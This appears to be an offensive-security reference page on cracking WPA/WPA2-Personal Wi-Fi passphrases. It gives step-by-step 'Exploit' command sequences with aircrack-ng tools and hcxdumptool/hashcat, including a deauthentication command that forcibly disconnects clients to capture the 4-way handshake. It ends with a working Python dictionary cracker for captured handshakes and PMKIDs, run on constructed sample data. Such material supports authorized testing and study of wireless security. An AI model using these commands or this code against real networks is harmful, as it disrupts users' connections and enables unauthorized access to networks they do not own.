WPA/WPA2 Personal
WPA2 (Wi-Fi Protected Access II) is the most widely deployed security protocol for wireless networks. It is stronger than its predecessor WPA, but WPA2-Personal still rests on a single pre-shared key (PSK) derived from the network passphrase, and that derivation can be attacked offline.
Gaining access to a WPA2-Personal network consists of capturing the 4-way handshake (or a PMKID) between the access point and a client, then running an offline dictionary attack against it: for every candidate passphrase the attacker recomputes the PSK (PBKDF2-HMAC-SHA1 over the passphrase and the SSID, 4096 iterations) and checks whether it reproduces the captured MIC or PMKID. Nothing is sent to the network during the cracking phase, so the only limits are the wordlist and the available CPU/GPU time; a long random passphrase that is not in any wordlist defeats the attack. The cracking step can be done with either Aircrack-ng or hashcat. None of this applies to WPA2-Enterprise (802.1X) or to WPA3-Personal, whose SAE exchange is designed to resist offline guessing.
Note that these commands were run with an external Wi-Fi adapter that supports monitor mode and packet injection, such as an Alfa adapter; many built-in laptop cards cannot inject frames.
Setup
## Kill processes that may interfere with monitor mode (NetworkManager, wpa_supplicant, ...)
airmon-ng check kill
## Start monitor mode; this creates a new monitor interface (typically wlan0mon), which is the [interface] used in the commands below
airmon-ng start [network interface]
Exploit (Aircrack-ng)
## Sniff packets on a specific BSSID and save them to a file to analyze (airodump-ng appends a sequence number to the prefix, so the capture is [output file]-01.cap)
airodump-ng [interface] --bssid [bssid] --channel [channel] --write [output file]
## Deauth a connected client so we can capture the 4-way handshake when it reconnects; -c takes the client's MAC (without it the deauth is broadcast to every client). airodump-ng prints "WPA handshake: [bssid]" in its top-right corner once it has captured one
aireplay-ng --deauth 10 -a [target network bssid] -c [client MAC] [interface]
## Use the captured handshake along with a wordlist to try to brute-force the password; -b selects the target network if the capture contains more than one
aircrack-ng -w [wordlist] -b [bssid] [output file]-01.cap
Exploit (hashcat)
## Stop all services that are accessing the WLAN device
systemctl stop NetworkManager.service
systemctl stop wpa_supplicant.service
## Capture Wi-Fi traffic (PMKIDs and EAPOL handshakes). These option names are from hcxdumptool 6.2.x; later releases renamed their options, so check hcxdumptool --help for the installed version
hcxdumptool -i [interface] -o [outputfile.pcapng] --active_beacon --enable_status=15
## Restart the stopped services to regain network connection
systemctl start NetworkManager.service
systemctl start wpa_supplicant.service
## Convert the .pcapng file to hashcat mode 22000 format; -E also writes the ESSIDs and other identity strings seen in the capture to a file, which is a useful seed wordlist
hcxpcapngtool -o [output.hc22000] -E [wordlist output name] [outputfile.pcapng]
## Run hashcat on the hc22000 output against a wordlist (the -E file or a larger list); mode 22000 handles both PMKID and EAPOL entries, so no separate PMKID run is needed
hashcat -m 22000 [output.hc22000] [wordlist]
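Both tools above do the same arithmetic once the capture is on disk. The following Python is an added example, not code from this page or from the aircrack-ng/hashcat projects: it builds a self-consistent EAPOL-Key message 2 and a PMKID from a known passphrase for a made-up network (the SSID, MACs, nonces and wordlist are all constructed here), then recovers the passphrase from each by recomputing PMK, PTK and MIC per candidate exactly as the crackers do. Function names are this example's own.

```python
"""Offline WPA2-PSK dictionary attack on a captured 4-way handshake or PMKID.
Constructed example: the target handshake is generated from a known passphrase."""
import hashlib
import hmac

# --- constructed sample data (hypothetical network, not a real capture) ---
SSID = "CorpWiFi"
AP_MAC = bytes.fromhex("a0b1c2d3e4f5")      # BSSID of the access point
STA_MAC = bytes.fromhex("0a1b2c3d4e5f")     # MAC of the client that reconnected
ANONCE = bytes(range(32))                   # nonce the AP sent in message 1
SNONCE = bytes(range(32, 64))               # nonce the client sent in message 2
# RSN IE (WPA2, CCMP pairwise/group, PSK AKM) carried in message 2's key-data field
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
TRUE_PASSPHRASE = "Password123"             # unknown to the attacker
WORDLIST = ["password", "letmein1", "Password123", "Welcome1"]

MIC_OFFSET = 81   # 4-byte 802.1X header + 77 bytes of key-descriptor fields before the MIC
NONCE_OFFSET = 17  # header + descriptor type + key info + key length + replay counter


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK (= PSK) = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))  # 4 * 20 bytes >= 64
    return out[:64]


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces))."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_message2(snonce: bytes, mic: bytes, key_data: bytes) -> bytes:
    """Assemble EAPOL-Key message 2 of the 4-way handshake."""
    body = (b"\x02"                  # descriptor type: RSN
            + b"\x01\x0a"            # key info: version 2 (HMAC-SHA1 MIC), pairwise, MIC bit
            + b"\x00\x10"            # key length 16 (CCMP)
            + b"\x00" * 7 + b"\x01"  # replay counter
            + snonce
            + b"\x00" * 16           # key IV
            + b"\x00" * 8            # key RSC
            + b"\x00" * 8            # reserved
            + mic
            + len(key_data).to_bytes(2, "big") + key_data)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v2, type EAPOL-Key


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1(PMK, "PMK Name" || AA || SPA)[:16], as sent by the AP in message 1."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def capture_target():
    """Stand-in for what airodump-ng / hcxdumptool would record from a real client."""
    pmk = pmk_from_passphrase(TRUE_PASSPHRASE, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    unsigned = build_message2(SNONCE, b"\x00" * 16, RSN_IE)
    msg2 = build_message2(SNONCE, eapol_mic(kck, unsigned), RSN_IE)
    return msg2, pmkid(pmk, AP_MAC, STA_MAC)


def crack_handshake(eapol_msg2, ssid, ap_mac, sta_mac, anonce, wordlist):
    """Dictionary attack on message 2: PMK -> PTK -> KCK -> MIC for every candidate."""
    snonce = eapol_msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    captured_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), captured_mic):
            return candidate
    return None  # passphrase not in wordlist


def crack_pmkid(captured_pmkid, ssid, ap_mac, sta_mac, wordlist):
    """PMKID attack (what hcxdumptool targets): needs no client and no deauth."""
    for candidate in wordlist:
        if hmac.compare_digest(pmkid(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac),
                               captured_pmkid):
            return candidate
    return None


if __name__ == "__main__":
    msg2, captured_pmkid = capture_target()
    print("handshake:", crack_handshake(msg2, SSID, AP_MAC, STA_MAC, ANONCE, WORDLIST))
    print("pmkid:    ", crack_pmkid(captured_pmkid, SSID, AP_MAC, STA_MAC, WORDLIST))
```

The PBKDF2 step dominates: every candidate costs 4096 HMAC-SHA1 rounds before the cheap MIC or PMKID check, which is why hashcat runs it on a GPU and why the SSID matters (it salts the PMK, so rainbow tables only work for common SSIDs). Note that a handshake capture only needs message 2 plus the ANonce from message 1; the PMKID path needs neither nonce nor client.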